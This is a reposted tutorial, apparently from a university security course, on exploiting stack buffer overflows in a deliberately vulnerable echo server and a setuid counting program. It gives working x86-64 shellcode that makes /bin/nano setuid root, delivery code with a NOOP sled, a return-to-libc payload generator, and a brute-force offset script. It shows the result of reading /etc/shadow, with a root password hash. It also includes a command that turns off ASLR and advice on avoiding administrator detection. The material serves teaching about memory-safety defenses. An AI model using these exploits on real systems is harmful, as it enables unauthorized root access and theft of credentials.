[Repost] Buffer Overflows and You (Part 2)

Got root?

Gentlemen, we can root it. We have the technology. We have the capability to root yet another poor idiot's server on the int4rw3bs. Steve Austin will be that man. Better than he was before. Better, stronger, faster, errrr...

We spent all that time developing a small bit of shellcode. Let's put it to good use. Suppose we have the program provided here. It's a simple echo server: whatever you send it, it sends back to you.

$ gcc -fno-stack-protector -z execstack -o server server.c
$ ./server 5000

Then in another terminal...

$ telnet
telnet> open 127.0.0.1 5000
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Hello
Hello
Hi
Hi

But this program has an error in it. If we look at the source code, we see that the buffer being used is 512 bytes. But, when recv() is called, we specify a buffer size of 1024 bytes. Ruh Roh. Back in our telnet session...

Hi
Hi
12456789012456789012456789012456789012456789012456789012456789012456789012456789
01245678901245678901245678901245678901245678901245678901245678901245678901245678
90124567890124567890124567890124567890124567890124567890124567890124567890124567
89012456789012456789012456789012456789012456789012456789012456789012456789012456
78901245678901245678901245678901245678901245678901245678901245678901245678901245
67890124567890124567890124567890124567890124567890124567890124567890124567890124
56789012456789012456789012456789012456789012456789012456789012456789012456789012
4567890124567890124567890124567890124567890124567890124567890124567890
Connection closed by foreign host.

And the server spits out...

send: Bad file descriptor
Segmentation fault (core dumped)
$

Gee whiz, I think we just trampled over all of the local variables, the saved frame pointer, and the return address. Well this looks promising!
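The bug boils down to handing recv() a length that is larger than the buffer it writes into. As a minimal sketch of the bounded version (echo_once is a hypothetical helper name, not a function taken from server.c), the length can be derived from the buffer itself:

```c
#include <assert.h>
#include <sys/socket.h>
#include <sys/types.h>

/* Hypothetical helper, not taken from server.c: echo one chunk back.
 * The length passed to recv() comes from the buffer itself, so it can
 * never exceed the 512 bytes that were actually allocated. */
ssize_t echo_once(int fd) {
  char buf[512];
  ssize_t n;

  assert(fd >= 0);
  n = recv(fd, buf, sizeof(buf), 0);   /* not a hard-coded 1024 */
  if (n <= 0)
    return n;                          /* peer closed, or error */
  return send(fd, buf, (size_t)n, 0);  /* echo only what was read */
}
```

With this version, a 600-byte message is simply echoed back in more than one chunk instead of running past the end of buf.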

For demonstration purposes, let's assume we also have a local account on the machine that the server is running on, and that the server is running as root so it can bind to a port below 1024. Since we have local access to the machine, instead of turning the server into a shell like we did in the Shellcode section, we could instead simply set "/bin/sh" setuid root. This means that the shell will always run as the user root, instead of an unprivileged user.

Sounds nice in theory, but many binaries have protections against running setuid. [5] /bin/bash (which /bin/sh is symlinked to on many systems) will not run as root if the real uid is not root. Fine. How about /bin/nano? That program will happily run as root (/bin/vi will not, otherwise we'd use that).
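The protection mentioned above comes down to comparing the real and effective user IDs. The following is only a sketch of that kind of startup check, not the actual code from bash or vi; the function names are made up for illustration:

```c
#include <assert.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 1 when the real and effective user IDs disagree, which is what
 * happens when an unprivileged user starts a setuid-root binary. */
int started_setuid(uid_t real, uid_t effective) {
  return real != effective;
}

/* Sketch of a cautious startup check: give up the elevated effective uid
 * when it differs from the real uid. Returns 0 on success, -1 on error. */
int drop_if_setuid(void) {
  uid_t real = getuid();
  uid_t effective = geteuid();

  if (!started_setuid(real, effective))
    return 0;                       /* nothing to drop */
  if (setuid(real) != 0)
    return -1;
  assert(geteuid() == real);        /* confirm the drop took effect */
  return 0;
}
```

A program that performs no such check (nano, in this walkthrough) keeps running with the effective uid of the file's owner.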

Finally, it's important to realize that attacks are still possible without local access - you just need slightly more complicated shellcode that spawns the shell and binds it to an open socket.

New "shellcode"

Anyway, we want a program like this...

#include <sys/stat.h>

int main() {
  chmod("/bin/nano", 04711);
}

chmod is also a system call (or, more precisely, chmod() is the wrapper provided by libc). Using the same process described in the Shellcode section, the end assembly that we come up with is this...

__asm__(
"mov    $0x11111111111119c9,%rsi\n\t" // arg 2 = 04711 (0x9c9), padded with 0x11
"shl    $0x30,%rsi\n\t"
"shr    $0x30,%rsi\n\t"               // upper 48 bits = 0
"mov    $0x111111111111116f,%rdi\n\t" // 'o' (0x6f), padded with 0x11
"shl    $0x38,%rdi\n\t"
"shr    $0x38,%rdi\n\t"               // upper 56 bits = 0, leaving "o" + NUL terminator
"push   %rdi\n\t"
"mov    $0x6e616e2f6e69622f,%rdi\n\t" // generate "/bin/nan"
"push   %rdi\n\t"                     // and push it onto the stack, completing "/bin/nano"
"mov    %rsp,%rdi\n\t"                // arg 1 = stack ptr = start of "/bin/nano"
"mov    $0x111111111111115a,%rax\n\t"
"shl    $0x38,%rax\n\t"
"shr    $0x38,%rax\n\t"               // syscall number = 90
"syscall\n\t"
);

And the actual payload is...

\x48\xbe\xc9\x19\x11\x11\x11\x11\x11\x11\x48\xc1\xe6\x30\x48\xc1\xee\x30\x48\xbf
\x6f\x11\x11\x11\x11\x11\x11\x11\x48\xc1\xe7\x38\x48\xc1\xef\x38\x57\x48\xbf\x2f
\x62\x69\x6e\x2f\x6e\x61\x6e\x57\x48\x89\xe7\x48\xb8\x5a\x11\x11\x11\x11\x11\x11
\x11\x48\xc1\xe0\x38\x48\xc1\xe8\x38\x0f\x05
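To double-check the listing, the same bytes can be written as a C array, grouped by instruction, and scanned for zero bytes. This is just a verification sketch; count_zero_bytes is a name invented here:

```c
#include <assert.h>
#include <stddef.h>

/* The payload bytes from the listing above, one instruction per line. */
static const unsigned char payload[] = {
  0x48,0xbe,0xc9,0x19,0x11,0x11,0x11,0x11,0x11,0x11, /* mov imm64,%rsi */
  0x48,0xc1,0xe6,0x30,                               /* shl $0x30,%rsi */
  0x48,0xc1,0xee,0x30,                               /* shr $0x30,%rsi */
  0x48,0xbf,0x6f,0x11,0x11,0x11,0x11,0x11,0x11,0x11, /* mov imm64,%rdi */
  0x48,0xc1,0xe7,0x38,                               /* shl $0x38,%rdi */
  0x48,0xc1,0xef,0x38,                               /* shr $0x38,%rdi */
  0x57,                                              /* push %rdi      */
  0x48,0xbf,0x2f,0x62,0x69,0x6e,0x2f,0x6e,0x61,0x6e, /* mov imm64,%rdi */
  0x57,                                              /* push %rdi      */
  0x48,0x89,0xe7,                                    /* mov %rsp,%rdi  */
  0x48,0xb8,0x5a,0x11,0x11,0x11,0x11,0x11,0x11,0x11, /* mov imm64,%rax */
  0x48,0xc1,0xe0,0x38,                               /* shl $0x38,%rax */
  0x48,0xc1,0xe8,0x38,                               /* shr $0x38,%rax */
  0x0f,0x05                                          /* syscall        */
};

/* Count how many bytes in p[0..len) are zero. */
size_t count_zero_bytes(const unsigned char *p, size_t len) {
  size_t i, zeros = 0;
  assert(p != NULL);
  for (i = 0; i < len; i++)
    if (p[i] == 0) zeros++;
  return zeros;
}
```

The array is 71 bytes long and contains no zero bytes, which is the point of the 0x11 padding.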

Tips and tricks

Okay, now we have a few problems. First of all, we have no idea where in memory this buffer is. But we have the source code, and we have access to the machine. So we can make an educated guess.

There are also a couple of tricks that we can play to improve our odds. The first trick improves our chances of overwriting the return address. We can accomplish this simply by repeating the new return address at the end of the payload a fair number of times. That way everything above the payload is overwritten with the new return address, and you're pretty much guaranteed to hit the actual return address. Now, there are alignment issues here so if you don't get it right the first time you may need to move the starting address by one byte (or two or three, or four, or five, or six, or seven).

The second trick we can play reduces the accuracy required for our new return address. Normally we would need to precisely point the return address at the start of our payload. But, what if our payload has a bunch of NOOPs in the beginning? As long as we land somewhere in this "NOOP sled" [6] the payload will correctly execute. So if you recall the stack layout from earlier, we want to transform it into the second image...

Delivery

Okay, let's get on with it. First add a printf() call to server.c that dumps the address of buf.

printf("buf ended up at %p\n", buf);

The output will be something like this (the address will invariably be different)...

buf ended up at 0x7fffffffe1a0

Alright. Let's write a program to deliver our payload, called send.c. You can see the entire program here. It's straightforward. All it does is connect to the specified port, and send the payload. The code that generates the payload can be seen here:

  ret += atoi(argv[2]);

  [...]

  /* NOOP sled */
  memset(buf, 0x90, 384);

  /* Payload */
  memcpy(buf+384, payload, sizeof(payload));

  /* Remaining buffer */
  addr = (long) buf+384+sizeof(payload);

  /* 8-byte align the return addresses */
  while (addr % 8 != 0) addr++;

  /* Repeat return address for rest of buf */
  for (i = 0; i < (sizeof(buf)-384-sizeof(payload)-8)/8; i++) {
    *(((long *)addr)+i) = ret;
  }

You can see we first add an offset to the return address; you'll discover why below. After that we take our 768-byte buffer and build it up starting with 384 bytes of NOOPs, followed by the actual payload, followed by our calculated return address repeated until the end of the buffer.
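The same layout can be expressed as a small standalone function. This is a sketch rather than the code from send.c: the names are hypothetical, alignment is computed relative to the start of the output buffer instead of its absolute address, and no 8-byte margin is kept at the end, so the number of repeated addresses can differ slightly from the original.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Round n up to the next multiple of 8. */
size_t align_up8(size_t n) { return (n + 7) & ~(size_t)7; }

/* Fill out[0..out_len) as: NOP sled | body | padding | repeated ret.
 * Returns how many copies of ret were written. Any trailing bytes that
 * do not fit a whole 8-byte address are left untouched. */
size_t fill_layout(unsigned char *out, size_t out_len, size_t sled_len,
                   const unsigned char *body, size_t body_len, uint64_t ret) {
  size_t end = sled_len + body_len;
  size_t off, copies = 0;

  assert(end <= out_len);
  memset(out, 0x90, sled_len);              /* 0x90 is the x86 NOP opcode */
  memcpy(out + sled_len, body, body_len);

  off = align_up8(end);                     /* first 8-byte aligned slot */
  if (off > out_len) off = out_len;
  memset(out + end, 0x90, off - end);       /* padding up to that slot */

  for (; off + sizeof(ret) <= out_len; off += sizeof(ret)) {
    memcpy(out + off, &ret, sizeof(ret));   /* memcpy avoids unaligned stores */
    copies++;
  }
  return copies;
}
```

With a 768-byte buffer, a 384-byte sled, and a 71-byte body, the first address slot lands at offset 456 and 39 copies fit.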

So, if we start up the server as root on port 1023...

[root@localhost ~]# ./server 1023

And then run our program...

$ ./send 1023 100

We can see the server is dead, but we didn't have any success with /bin/nano...

Connected to 127.0.0.1
send: Bad file descriptor
Segmentation fault (core dumped)
[root@localhost ~]# ls -l /bin/nano
-rwxr-xr-x. 1 root root 177328 2009-11-18 12:54 /bin/nano

Well, now it's basically a matter of trial and error. The buffer isn't located at precisely the same place when run as root for one simple reason: the environment variables. Recall our original stack layout...

Since the environment variables generally change from account to account, system to system, we have to guess an offset. Our NOOP sled gives us some leniency in this guessing, so if we start going at 300 byte increments eventually we'll stumble on the proper offset. For our example system the offset happens to be anywhere around 900...
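Why stepping in 300-byte increments is enough can be modeled in a few lines. The sketch below is only a model: in a real attempt the true buffer address is unknown, and the function names and numbers in the usage note are hypothetical. Because the step (300) is smaller than the sled (384), no sled position can be skipped over.

```c
#include <assert.h>
#include <stdint.h>

/* A guessed return address works if it points anywhere inside the sled. */
int lands_in_sled(uint64_t guess, uint64_t buf_start, uint64_t sled_len) {
  return guess >= buf_start && guess - buf_start < sled_len;
}

/* Try offsets 0, step, 2*step, ... added to base and return the first one
 * that lands in the sled, or -1 if none does within max_tries attempts. */
long first_working_offset(uint64_t base, uint64_t buf_start,
                          uint64_t sled_len, long step, int max_tries) {
  int i;

  assert(step > 0);
  for (i = 0; i < max_tries; i++) {
    long offset = i * step;
    if (lands_in_sled(base + (uint64_t)offset, buf_start, sled_len))
      return offset;
  }
  return -1;
}
```

If the printed address were 0x7fffffffe1a0 and the buffer in the root-owned process actually sat 700 bytes higher (a made-up figure), offsets 0, 300, and 600 would miss and 900 would land inside the sled.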

Victory

$ ./send 1023 900
$ ls -l /bin/nano
-rws--x--x. 1 root root 177328 2009-11-18 12:54 /bin/nano
$ nano /etc/shadow
  GNU nano 2.0.9             File: /etc/shadow

root:$1$vH1c/O5N$oA0VKFanh6OvM37AJ7BFR/:14725:0:99999:7:::
bin:*:13878:0:99999:7:::
daemon:*:13878:0:99999:7:::
adm:*:13878:0:99999:7:::
lp:*:13878:0:99999:7:::
sync:*:13878:0:99999:7:::
shutdown:*:13878:0:99999:7:::
halt:*:13878:0:99999:7:::
mail:*:13878:0:99999:7:::
news:*:13878:0:99999:7:::
uucp:*:13878:0:99999:7:::
operator:*:13878:0:99999:7:::
                               [ Read 48 lines ]
^G Get Help  ^O WriteOut  ^R Read File ^Y Prev Page ^K Cut Text  ^C Cur Pos
^X Exit      ^J Justify   ^W Where Is  ^V Next Page ^U UnCut Text^T To Spell

That's right, we have write access to /etc/shadow now. If you're not sure what to do at this point, well ... . .. ..

That said, we kind of glossed over an important fact. Every time we tried the exploit and failed, the server segfaulted. Most systems will log this event, and it won't take long for the administrator to figure out what's going on. Also, every time the server dies it must be restarted - this in itself isn't a big hurdle, if it's a relatively important service there may easily be a crontab that restarts it every 10 minutes or something. And looking back, it only took 3 or 4 attempts to get it right.

The main concern is almost certainly the segmentation faults. We can get around this by adding an exit() syscall to the end of our payload. This is a very simple thing to do, and the exercise is left to the reader.

Modern defenses

Everything has been pretty cool up to this point. Sadly, it's time for reality. The attacks that we just talked about no longer work as-is on most modern systems. There are three reasons for this...

NX and Exec Shield

Modern architectures provide a "No eXecute" bit, which allows you to mark certain regions of memory as non-executable. If the stack is marked in this way, it is impossible to run shellcode that has been injected into a buffer on the stack. That said, you may be able to get around this by overflowing a heap buffer (but heaps are almost always non-executable now too) or by using a return-to-libc-style attack.

On older architectures that do not provide the NX bit, there is something called "exec shield," found on many Red Hat systems. It emulates the NX bit on systems that do not have hardware support for it. Other systems accomplish the same thing, just with a different name. Even newer versions of windoze have support for software emulation of the NX bit, called "Data Execution Prevention" (DEP).

If you recall from earlier, we actually turned this off for our programs. This can be accomplished by setting a flag in the actual binary (we can also shut it off system-wide, but there's really no reason to). You can use "execstack" to set the flag on existing binaries, or, if you're compiling a new binary you can pass the "-z execstack" flag on to gcc.
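On Linux, one way to see whether the flag took effect is to look at the permissions of the "[stack]" mapping of a running process. The sketch below assumes the /proc/<pid>/maps line format ("start-end perms offset dev inode path"), which differs from the pmap output shown elsewhere in this article; the function names are invented for illustration.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Parse one line in /proc/<pid>/maps format and report whether the mapping
 * is executable: 1 = yes, 0 = no, -1 = line not understood. */
int mapping_is_executable(const char *line) {
  const char *perms;

  assert(line != NULL);
  perms = strchr(line, ' ');          /* space before the "rwxp" field */
  if (perms == NULL || strlen(perms) < 5)
    return -1;
  return perms[3] == 'x';             /* perms[1..4] hold r, w, x, p/s */
}

/* Linux-specific: look up the "[stack]" line for the current process.
 * Returns 1, 0, or -1 if the information is unavailable. */
int stack_is_executable(void) {
  char line[512];
  int result = -1;
  FILE *f = fopen("/proc/self/maps", "r");

  if (f == NULL)
    return -1;
  while (fgets(line, sizeof(line), f) != NULL) {
    if (strstr(line, "[stack]") != NULL) {
      result = mapping_is_executable(line);
      break;
    }
  }
  fclose(f);
  return result;
}
```

A binary built with "-z execstack" would be expected to report 1 here, and one built without it to report 0.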

gcc StackGuard

gcc, as configured on many distributions, also adds extra code to programs by default to protect against stack buffer overflows. This extra code places a "special" value called a canary between the local variables and the saved frame pointer and return address, and checks to make sure it hasn't been overwritten before proceeding to execute a return. We disable it by passing "-fno-stack-protector" when compiling.
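The idea behind the canary can be simulated without corrupting a real stack. In this sketch the "frame" is just a byte array laid out as buffer, canary, return address; the sizes and the canary value are arbitrary choices made here, whereas a real canary is chosen at run time so that it cannot be predicted.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define BUF_LEN 16
#define CANARY  0xdeadc0deu   /* arbitrary value chosen for this sketch */

/* Simulated frame: [ buf (16 bytes) | canary (4) | return address (4) ]. */
struct fake_frame {
  unsigned char bytes[BUF_LEN + 4 + 4];
};

/* Copy n attacker-controlled bytes to the start of the simulated frame and
 * report whether the canary survived (1) or was overwritten (0). */
int canary_survives(size_t n) {
  struct fake_frame f;
  unsigned char input[sizeof(f.bytes)];
  uint32_t canary = CANARY, check;

  assert(n <= sizeof(f.bytes));        /* stay inside the simulation */
  memset(&f, 0, sizeof(f));
  memcpy(f.bytes + BUF_LEN, &canary, sizeof(canary));
  memset(input, 'A', sizeof(input));

  memcpy(f.bytes, input, n);           /* the "overflow" */

  memcpy(&check, f.bytes + BUF_LEN, sizeof(check));
  return check == CANARY;
}
```

Writing 16 bytes leaves the canary intact, while writing even one byte more changes it, so an overflow cannot reach the return address without being noticed at the check.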

Address space layout randomization (ASLR)

Let's take our sample program from the introduction, sample1, and run it a couple of times while looking at each memory map...

$ pmap 12662
12662:   ./sample1
0000000000400000      4K r-x--  /home/turkstra/src/cs526/sample1
0000000000600000      4K rw---  /home/turkstra/src/cs526/sample1
00000032e7000000    120K r-x--  /lib64/ld-2.11.1.so
00000032e721d000      4K r----  /lib64/ld-2.11.1.so
00000032e721e000      4K rw---  /lib64/ld-2.11.1.so
00000032e721f000      4K rw---    [ anon ]
00000032e7400000   1468K r-x--  /lib64/libc-2.11.1.so
00000032e756f000   2048K -----  /lib64/libc-2.11.1.so
00000032e776f000     16K r----  /lib64/libc-2.11.1.so
00000032e7773000      4K rw---  /lib64/libc-2.11.1.so
00000032e7774000     20K rw---    [ anon ]
00007f314ab04000     12K rw---    [ anon ]
00007f314ab28000     12K rw---    [ anon ]
00007fff06c3d000     84K rw---    [ stack ]
00007fff06d19000      4K r-x--    [ anon ]
ffffffffff600000      4K r-x--    [ anon ]
 total             3812K

$ pmap 12666
12666:   ./sample1
0000000000400000      4K r-x--  /home/turkstra/src/cs526/sample1
0000000000600000      4K rw---  /home/turkstra/src/cs526/sample1
00000032e7000000    120K r-x--  /lib64/ld-2.11.1.so
00000032e721d000      4K r----  /lib64/ld-2.11.1.so
00000032e721e000      4K rw---  /lib64/ld-2.11.1.so
00000032e721f000      4K rw---    [ anon ]
00000032e7400000   1468K r-x--  /lib64/libc-2.11.1.so
00000032e756f000   2048K -----  /lib64/libc-2.11.1.so
00000032e776f000     16K r----  /lib64/libc-2.11.1.so
00000032e7773000      4K rw---  /lib64/libc-2.11.1.so
00000032e7774000     20K rw---    [ anon ]
00007fbbe2954000     12K rw---    [ anon ]
00007fbbe2978000     12K rw---    [ anon ]
00007fff261f5000     84K rw---    [ stack ]
00007fff26282000      4K r-x--    [ anon ]
ffffffffff600000      4K r-x--    [ anon ]
 total             3812K

Notice how the address of the stack keeps changing? Well this is the final nail in the coffin. If the stack is no longer executable, we must rely on return-to-libc style attacks, and those almost always rely on knowing where to find a particular function (like system()) as well as a string to pass that function (eg, "/bin/sh"). With the stack's location randomized, the location of that string changes every time the program executes. This makes attacks much more difficult, particularly if the randomization is being done properly.

It's worth noting that ASLR is most effective in combination with a non-executable stack. If the stack is executable it's often possible to develop a payload that does not strictly rely on exact addresses (the NOOP sled in the previous example tolerates an imprecise return address, for instance).
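On Linux the current setting can be read from /proc/sys/kernel/randomize_va_space, and the effect can be observed by printing the address of a local variable on each run. A minimal sketch, with function names invented here:

```c
#include <assert.h>
#include <stdio.h>

/* Linux-specific: returns the value in /proc/sys/kernel/randomize_va_space
 * (0 means randomization is off, 1 and 2 enable increasing amounts of it),
 * or -1 if the file cannot be read. */
int aslr_setting(void) {
  int value = -1;
  FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");

  if (f == NULL)
    return -1;
  if (fscanf(f, "%d", &value) != 1)
    value = -1;
  fclose(f);
  return value;
}

/* Print the address of a local variable as a rough indicator of where the
 * stack ended up in this run. */
void print_stack_address(FILE *out) {
  int marker = 0;

  assert(out != NULL);
  fprintf(out, "a local variable lives at %p\n", (void *)&marker);
}
```

Calling print_stack_address(stdout) from main and running the program several times should show a different address each time when the setting is non-zero.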

return-to-libc attack

Things have hopefully been enlightening up to this point, although probably a bit disappointing after reading the defenses section. That said, none of the protections listed are perfect. In this section we will look at the scenario in which the stack has been marked non-executable (and the heap, and anywhere else considered unusual).

ASLR does need to be turned off, however, so be sure to execute the following as root, if you haven't already:

echo 0 > /proc/sys/kernel/randomize_va_space

We start with a small cop-out. As was revealed in an earlier section, x86_64 Linux systems use registers to pass many if not all of their arguments. It is considerably more difficult (though still not impossible) to get values into registers than it is onto the stack, as one might guess. So for this section we're going to deal with programs compiled for a 32-bit environment. When running on this architecture, Linux uses the stack to pass parameters instead of registers. We can still use our 64-bit machine (it is backwards compatible, after all), we'll just need to use the "-m32" compiler flag.

The program

To start with, let's assume we have the following vulnerable program, and that it runs setuid root. It also has stack execution disabled. You can get the program here. It simply counts the occurrences of a specified character in a file.

[root@localhost tmp]# gcc -m32 -fno-stack-protector -o count count.c
[root@localhost tmp]# chmod 4755 count

So as an unprivileged user, we can run the program and it works fine (but remember, the program itself is running as root)...

$ /tmp/count ./count.c a
./count.c contains 18 occurrences of a
$ dd if=/dev/urandom of=bigfile bs=1 count=2048
2048+0 records in
2048+0 records out
2048 bytes (2.0 kB) copied, 0.0238982 s, 85.7 kB/s
$ /tmp/count ./bigfile a
Segmentation fault
$

So if you look at the source you can see once again there is a mistake leaving the program vulnerable to an overflow attack. The buffer is 512 bytes, while the fread() call is willing to read up to 1024 bytes.
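For comparison, here is a sketch of the same counting loop with the read size tied to the buffer. It is not the code from count.c; count_char is a hypothetical name and the function takes an already opened stream.

```c
#include <assert.h>
#include <stdio.h>

/* Count occurrences of c in an open stream, reading in bounded chunks.
 * fread() is never asked for more than the buffer can hold. */
long count_char(FILE *f, int c) {
  unsigned char buf[512];
  size_t n, i;
  long total = 0;

  assert(f != NULL);
  while ((n = fread(buf, 1, sizeof(buf), f)) > 0) {
    for (i = 0; i < n; i++) {
      if (buf[i] == (unsigned char)c)
        total++;
    }
  }
  return total;
}
```

A 2048-byte file is then processed as four 512-byte chunks instead of overflowing the buffer.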

The payload

Okay then, let's start with our chmod() code from the last attack.

#include <sys/stat.h>

int main() {
  chmod("/bin/nano", 04711);
}

If we compile this and disassemble main, we end up with this...

$ gcc -m32 -o mychmod mychmod.c
$ gdb mychmod
GNU gdb (GDB) Fedora (7.0.1-44.fc12)
Reading symbols from /home/turkstra/mychmod...(no debugging symbols found)...done.
(gdb) disassemble main
Dump of assembler code for function main:
0x080483c4 <main+0>:    push   %ebp
0x080483c5 <main+1>:    mov    %esp,%ebp
0x080483c7 <main+3>:    and    $0xfffffff0,%esp
0x080483ca <main+6>:    sub    $0x10,%esp
0x080483cd <main+9>:    movl   $0x9c9,0x4(%esp)
0x080483d5 <main+17>:   movl   $0x80484b4,(%esp)
0x080483dc <main+24>:   call   0x80482f4 <chmod@plt>
0x080483e1 <main+29>:   leave
0x080483e2 <main+30>:   ret
End of assembler dump.
(gdb) break main
Breakpoint 1 at 0x80483c7
(gdb) run
Starting program /home/turkstra/mychmod
Breakpoint 1, 0x080483c7 in main ()
(gdb) print chmod
$1 = {<text variable, no debug info>} 0x6f37f0 <chmod>

This should look familiar, and relatively straightforward. We can see the arguments for chmod being stored on the stack (the mode at 0x4(%esp), the address of the string at (%esp)), followed by a call to chmod. Actually, since we didn't use -static, the call is indirect. It goes through a jump table (the PLT), which allows the shared library to be loaded anywhere in memory without having to recompile the main program. The loader simply sets up the correct values in the jump table on startup. We can find the location of the real chmod by printing the symbol after the program has started. It ends up being 0x6f37f0.

Our payload seems simple this time - we just need the address of the function to call (chmod) in place of the return address, followed by the two arguments: the address of the string "/bin/nano" and the file mode. Except this time we cannot use our little trick of pushing "/bin/nano" onto the stack (we can't execute any instructions of our own).

Well, one way to get around this, particularly if the program is being run locally, is to place the string into an environment variable. Suppose we have this simple program:

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[], char *envp[]) {
  int i = 0;

  while (envp[i]) {
    if (strcmp(envp[i], "BAH=/bin/nano") == 0)
      printf("Found BAH=\"/bin/nano\" at %p\n", envp[i]);
    i++;
  }

  return 0;
}
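Note that the address printed by this program is that of the whole "BAH=/bin/nano" entry; the path itself starts after the "BAH=" prefix, 4 bytes further on. A small sketch of a lookup that returns the value part directly (find_env_value is a name invented here; the standard getenv() does the same job for the real environment):

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Return a pointer to the value part of the "name=value" entry in envp,
 * or NULL if no entry with exactly that name exists. */
const char *find_env_value(char *const envp[], const char *name) {
  size_t len;
  int i;

  assert(envp != NULL && name != NULL);
  len = strlen(name);
  for (i = 0; envp[i] != NULL; i++) {
    if (strncmp(envp[i], name, len) == 0 && envp[i][len] == '=')
      return envp[i] + len + 1;       /* skip "name=" */
  }
  return NULL;
}
```

This prefix is one of the reasons the address used for the string needs a small adjustment before it points at "/bin/nano" itself.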

We can then set an environment variable containing "/bin/nano" and run the program (saved as findnano.c)...

$ export BAH="/bin/nano"
$ gcc -m32 -o findnano findnano.c
$ ./findnano
Found BAH="/bin/nano" at 0xffffdf12

And it should roughly be at that location for every program that runs. Roughly because depending on the environment variables (which include the name of the binary and its path) it may shift around a few bytes. Cool. Well, now we have everything we need. We just need to develop a file that delivers our payload. Take a look at gen.c. The parts of interest are below...

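  /* Garbage to fill the buffer */
  memset(buf, 0x61, 512);

  /* Local vars and saved frame pointer */
  memset(buf+512, 0x01, 28);

  /* Return address: the real chmod found with gdb */
  addr = (long) buf + 512 + 28;
  *((long *)addr) = 0x6f37f0;

  /* Args: skip the 4-byte return address plus the 4-byte slot that
     chmod will treat as its own return address */
  addr = (long) buf + 512 + 28 + 8;
  *((long *)addr) = 0xffffdf10 + atoi(argv[2]); /* guessed address of "/bin/nano" */
  addr = (long) addr + 4;
  *((long *)addr) = 0x9c9;                      /* mode 04711 */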

You can see that we set the return address to be the starting address of chmod, and then proceed to place the arguments onto the stack. But how did we find those offsets? Easy: if we open count in gdb and disassemble main, we can see in the prologue...

0x08048484 <main+0>:    push   %ebp
0x08048485 <main+1>:    mov    %esp,%ebp
0x08048487 <main+3>:    and    $0xfffffff0,%esp
0x0804848a <main+6>:    sub    $0x220,%esp

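The "sub $0x220,%esp" allocates space for our local variables. 0x220 in decimal is 544. The somewhat complicated catch here is that the "and $0xfffffff0,%esp" instruction above clears the lower 4 bits of ESP, rounding it down to a 16-byte boundary, so the 544 bytes are not measured directly from the saved base pointer. The exact distance from the buffer to the return address also depends on that alignment and on where the compiler places the buffer within the frame. For our binary, the return address ends up at an offset of 540 from the start of the buffer. When main returns into chmod, chmod expects to find its own return address on top of the stack with its arguments right after it, so the arguments to chmod must be located 548 bytes above the start of the buffer.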

If you didn't know any of this, you could still figure it out. It would just take some experimenting to discover the proper values. A helpful way to see what is going on is to recompile count.c and include the stack walking function from earlier. Using that you can play around until the stack looks correct, and then go from there.
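The arithmetic behind those offsets can be written down explicitly. This sketch only restates the numbers from the text (540, 548) under the usual 32-bit cdecl convention; the struct and function names are invented for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Effect of "and $0xfffffff0,%esp": clear the low 4 bits, rounding the
 * stack pointer down to a multiple of 16 (a shift of 0 to 15 bytes). */
uint32_t align_down16(uint32_t esp) { return esp & 0xfffffff0u; }

/* Offsets from the start of buf for a function entered through "ret".
 * On entry the callee expects [esp] = its own return address,
 * [esp+4] = first argument, [esp+8] = second argument. */
struct ret2libc_offsets {
  uint32_t ret_addr;   /* overwritten return address (points at chmod) */
  uint32_t fake_ret;   /* where chmod would "return" to afterwards     */
  uint32_t arg1;       /* pointer to "/bin/nano"                       */
  uint32_t arg2;       /* file mode                                    */
};

struct ret2libc_offsets offsets_from(uint32_t ret_addr_offset) {
  struct ret2libc_offsets o;

  assert(ret_addr_offset % 4 == 0);
  o.ret_addr = ret_addr_offset;
  o.fake_ret = ret_addr_offset + 4;
  o.arg1 = ret_addr_offset + 8;
  o.arg2 = ret_addr_offset + 12;
  return o;
}
```

With the return address at offset 540, the slot chmod treats as its own return address is at 544, the string pointer at 548, and the mode at 552, which matches the "+ 8" and "+ 4" steps in gen.c.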

The exploit

As was mentioned earlier, the "/bin/nano" string will shift around depending on the environment variables. That's why our program above allows us to specify an offset to add to its address. At this point it is probably worthwhile to make sure that what we have works. We can use strace to run the count program (it will run unprivileged) and see if we at least end up invoking chmod...

$ gcc -o gen gen.c
$ ./gen bah 0  # Generate the payload
$ strace ./count bah a
[...]
write(1, "Found 16843009 occurrences of \1\n", 32Found 16843009 occurrences of ?) = 32
chmod("QTLIB=/usr/lib64/qt-3.3/lib", 04711) = -1 ENOENT (No such file or directory)
--- SIGSEGV (Segmentation fault) @ 0 (0) ---
+++ killed by SIGSEGV +++
Segmentation fault
$

Excellent. It invoked chmod. The first argument is obviously wrong, but this is where the guesswork comes in. We can write a script that will generate payloads with various addresses and run them against the vulnerable program...

#! /bin/bash

for I in {0..60}; do
  ./gen bah ${I}
  ./count bah a
  ls -l /bin/nano | grep rws > /dev/null
  if [[ $? == 0 ]]; then
    echo "offset was ${I}"
    break;
  fi
done

This will try up to 61 different addresses (offsets 0 through 60) for "/bin/nano"...

$ ls -l /bin/nano
-rwxr-xr-x. 1 root root 177328 2009-11-18 12:54 /bin/nano
$ ./runit
Found 16843009 occurrences of $ ls -l /bin/nano

./runit: line 3: 16775 Segmentation fault      ./count bah a
[...]
Found 16843009 occurrences of $ ls -l /bin/nano

./runit: line 3: 16896 Segmentation fault      ./count bah a
offset was 41
$ ls -l /bin/nano
-rws--x--x. 1 root root 177328 2009-11-18 12:54 /bin/nano

And as you can see, 60 is more than enough. Once again we are now able to write to /etc/shadow using nano. Mission accomplished.

Conclusion

That's about it, for now. While these attacks are more difficult, if not impossible, on modern systems, there are still a number of older systems out there that are vulnerable to attacks like these. There are also a number of cases where modern systems have these protections turned off, either for a single application simply because it does things in a way that requires more leniency, or system-wide due to incompetent system administration.

"Never underestimate the power of somebody with source code, a text editor, and the willingness to totally hose their system." - Rob Landley

Any feedback related to the site is appreciated - particularly if there are any errors or you feel something could be reworded to be more easily understood. Simply contact jeff@turkstra.net.

More information about the author can be found on TurkeyLand!

References

[1] W. Holzmann, "Memory Layout (Virtual address space of a C process)," www.cs.uleth.ca. [Online]. Available: http://www.cs.uleth.ca/~holzmann/C/system/memorylayout.pdf. [Accessed: Apr. 5, 2010].

